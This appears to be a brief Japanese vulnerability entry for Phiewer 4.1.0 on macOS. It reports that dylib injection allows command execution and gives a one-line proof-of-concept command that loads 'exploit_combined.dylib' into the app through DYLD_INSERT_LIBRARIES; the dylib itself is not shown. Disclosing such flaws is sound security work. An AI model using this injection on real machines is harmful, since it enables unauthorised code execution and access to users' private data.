
Phiewer 4.1.0では、dylibインジェクションによりコマンド実行が可能となり、攻撃者はdylibファイルを注入することで、リモート制御やMacOS上の機密ユーザーデータへの不正アクセスの可能性が生じます。
.dylibファイルを使用してコマンドを注入します
DYLD_INSERT_LIBRARIES=exploit_combined.dylib /Applications/Phiewer\ \(lite\).app/Contents/MacOS/Phiewer\ \(lite\)
コマンド実行(ローカル)